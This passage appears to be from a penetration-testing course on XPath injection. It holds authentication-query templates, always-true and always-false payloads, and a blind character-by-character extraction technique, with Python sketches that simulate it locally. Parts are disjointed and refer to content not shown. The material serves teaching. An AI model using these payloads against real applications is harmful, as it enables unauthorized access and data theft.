13 XPath
13.2. XPath
13.4. Exploitation
The next line describes the root element of the document. XML
elements define the structure of the document and identify named
sections of information. It is important to know that elements form a
document tree: in this specific case, <users> is the parent of all other
elements.
Note that all elements must have a closing tag and must be properly
nested.
The element above is a child node of the element user. This
time, the element does not contain a child. Instead, it contains
text.
You can consider this text as the value of the element. If you
consider a database structure, jason would be the text contained
in the table users, column user with id=1.
https://msdn.microsoft.com/en-us/library/ms256177(v=vs.110).aspx
https://www.w3.org/TR/xpath-30/
XPath expression: /users//username
XPath result:
Element='<username>jason</username>'
Element='<username>chris</username>'
XPath expression: //user[@id='1']/username
XPath result:
Element='<username>jason</username>'
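The two expressions above can be tried against a small sample document. What follows is a minimal sketch using Python's standard xml.etree.ElementTree module, which supports only a subset of XPath and evaluates paths relative to the element it is called on, so /users//username is written as .//username from the root. The password values and the id of the second user are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Sample document; the passwords and id="2" are illustrative assumptions.
XML_DOC = """
<users>
  <user id="1">
    <username>jason</username>
    <password>example-password-1</password>
  </user>
  <user id="2">
    <username>chris</username>
    <password>example-password-2</password>
  </user>
</users>
""".strip()

root = ET.fromstring(XML_DOC)  # root is the <users> element

# Equivalent of /users//username: every username below the root.
all_usernames = [el.text for el in root.findall(".//username")]

# Equivalent of //user[@id='1']/username: username of the user with id 1.
first_username = [el.text for el in root.findall(".//user[@id='1']/username")]

print(all_usernames)
print(first_username)
```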
• //: select all user elements no matter where they are in the
document
• username/text()='<USERNAME>': return only the element
with the username text value set to <USERNAME>
• and: Boolean operator
• password/text()='<PASSWORD>': return only the element
with the password text value set to <PASSWORD>
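The components listed above are typically assembled on the server by inserting user input into a query string. The following sketch shows one way this might look, assuming plain string concatenation with no escaping; the function name build_auth_query and the sample values are hypothetical.

```python
def build_auth_query(username: str, password: str) -> str:
    """Build the authentication query by plain concatenation (no escaping)."""
    return (
        "//user[username/text()='" + username + "' "
        "and password/text()='" + password + "']"
    )


# Hypothetical credentials, used only to show the resulting query string.
query = build_auth_query("jason", "example-password")
print(query)
```

Because the input is copied into the query unchanged, any character with a special meaning in XPath becomes part of the query itself.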
• APOSTROPHE ('): used as string terminator
• COMMA (,): used to break integers, although any character would work
After injecting the test payload, the attacker receives an error and,
from that, can glean that his input payload has broken the XPath
query.
The error message shows that the XPath query has been broken
by the input character ' .
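Why a single apostrophe breaks the query can be illustrated by counting string delimiters. This is a rough sketch only: it assumes the query has the quoted form shown in the template below, and it uses quote parity as a stand-in for the syntax check a real XPath parser would perform. The names TEMPLATE and quotes_balanced are hypothetical.

```python
# Assumed shape of the server-side query; the real one is unknown to the attacker.
TEMPLATE = "//user[username/text()='{username}' and password/text()='{password}']"


def quotes_balanced(query: str) -> bool:
    """Return True when the query contains an even number of apostrophes."""
    return query.count("'") % 2 == 0


normal_query = TEMPLATE.format(username="jason", password="x")
probed_query = TEMPLATE.format(username="'", password="x")

print(quotes_balanced(normal_query))  # every string literal is closed
print(quotes_balanced(probed_query))  # the injected ' leaves a literal open
```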
The web application output will be different from the one returned
with a FALSE condition like 1=2.
For the next tests, we will use the same web application used
before, but this time the error messages are not displayed.
The goal of the attacker is to look for two payloads making the
XPath query respectively always TRUE and always FALSE.
Now, the attacker does not know the XPath query but can assume
that it is something similar to this:
//<someNode>[<someOtherNode>=<countryID>]
The web application has shown only one record, probably the first
or the last depending on the web application's server-side code.
999999 or 2=2
999999 or 1=2
999999 or 1=9
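The effect of these three payloads can be modeled in plain Python. Python's standard library has no full XPath engine, so this is only a sketch of the Boolean logic, assuming the numeric predicate has the form <someOtherNode>=<input>. The node values and function names are hypothetical.

```python
def predicate_matches(node_value: int, user_input: str) -> bool:
    """Model `node_value = <user_input>` for inputs shaped like 'N or a=b'."""
    clauses = user_input.split(" or ")
    # The first clause completes the original comparison: node_value = N.
    result = node_value == int(clauses[0])
    # Each injected clause is a constant comparison such as 2=2 or 1=2.
    for clause in clauses[1:]:
        left, right = clause.split("=")
        result = result or (int(left) == int(right))
    return result


COUNTRY_IDS = [1, 2, 3]  # hypothetical values stored in the document


def matching_nodes(user_input: str) -> list:
    """Return the node values selected by the predicate for a given input."""
    return [cid for cid in COUNTRY_IDS if predicate_matches(cid, user_input)]


print(matching_nodes("999999 or 2=2"))  # always TRUE: every node matches
print(matching_nodes("999999 or 1=2"))  # always FALSE: no node matches
print(matching_nodes("999999 or 1=9"))  # always FALSE: no node matches
```

In this model the always-TRUE payload selects every node, which is consistent with the application then displaying a single record from the full set.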
Generally, an XPath authentication query looks like the following:
//user[username/text()='<USERNAME>' and password/text()='<PASSWORD>']
A OR C OR D AND B
can be represented as:
• (A OR C) OR (D AND B)
A AND B OR C
can be represented as:
• (A AND B) OR (C)
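These groupings follow from operator precedence: in XPath, and binds more tightly than or. Python uses the same precedence for its own and/or operators, so the equivalences can be checked exhaustively with a short sketch. The function names are hypothetical.

```python
from itertools import product


def flat_four(a, b, c, d):
    # Written without parentheses: `and` is evaluated before `or`.
    return a or c or d and b


def grouped_four(a, b, c, d):
    return (a or c) or (d and b)


def flat_three(a, b, c):
    return a and b or c


def grouped_three(a, b, c):
    return (a and b) or c


# Compare both forms over every combination of truth values.
four_ok = all(
    flat_four(*v) == grouped_four(*v) for v in product([False, True], repeat=4)
)
three_ok = all(
    flat_three(*v) == grouped_three(*v) for v in product([False, True], repeat=3)
)
print(four_ok, three_ok)
```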
Note that each time the condition is true, it means that the
character used is correct and we can then go on with the next
character.
• ...
• ' or substring(name(/*[1]),2,1)='s
<users>
…
</users>
To get the first character, the attacker must try each of the following
payloads in turn until the condition evaluates to TRUE:
• ' or substring(name(/users/*[1]),1,1)='a
• ' or substring(name(/users/*[1]),1,1)='b
• ' or substring(name(/users/*[1]),1,1)='c
• ...
• ' or substring(name(/users/*[1]),1,1)='u
<users>
<user>
…
</user>
</users>
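The character-by-character search described above can be sketched as a loop around a TRUE/FALSE oracle. In a real attack the oracle would be the web application's response to each payload; here it is simulated locally, so make_oracle, extract_name and the lowercase-only character set are assumptions made for illustration.

```python
import string
import xml.etree.ElementTree as ET

root = ET.fromstring("<users><user><username>jason</username></user></users>")


def xpath_substring(value: str, start: int, length: int) -> str:
    """Model XPath substring(), which counts characters from 1."""
    return value[start - 1 : start - 1 + length]


def make_oracle(node_name: str):
    """Simulate the TRUE/FALSE answer to substring(name(<path>),<pos>,1)='<char>'."""
    def oracle(position: int, char: str) -> bool:
        return xpath_substring(node_name, position, 1) == char
    return oracle


def extract_name(oracle) -> str:
    """Recover a node name one character at a time using only the oracle."""
    recovered = ""
    position = 1
    while True:
        for char in string.ascii_lowercase:  # assumed character set
            if oracle(position, char):
                recovered += char
                position += 1
                break
        else:
            # No character matched: the end of the name was reached.
            return recovered


root_name = extract_name(make_oracle(root.tag))      # models name(/*[1])
child_name = extract_name(make_oracle(root[0].tag))  # models name(/users/*[1])
print(root_name, child_name)
```

A name containing characters outside the assumed set would be cut short, so a real search would need a wider alphabet.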
In our example, we will say that you know all the identifiers of the
nodes: users, user, username, password and how they appear
in the hierarchy.
/users/user[position()=$i]/username
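What this expression selects for successive values of $i can be shown with a short sketch. It uses Python's xml.etree.ElementTree, where the positional predicate is written as [i] and the path is relative to the <users> root. The sample document, including its password values, is an assumption made for illustration.

```python
import xml.etree.ElementTree as ET

# Sample document; the password values are illustrative assumptions.
XML_DOC = """
<users>
  <user id="1">
    <username>jason</username>
    <password>example-password-1</password>
  </user>
  <user id="2">
    <username>chris</username>
    <password>example-password-2</password>
  </user>
</users>
""".strip()

root = ET.fromstring(XML_DOC)

usernames = []
i = 1
while True:
    # Equivalent of /users/user[position()=$i]/username, relative to <users>.
    node = root.find(f"./user[{i}]/username")
    if node is None:
        break  # no user at this position: the enumeration is complete
    usernames.append(node.text)
    i += 1

print(usernames)
```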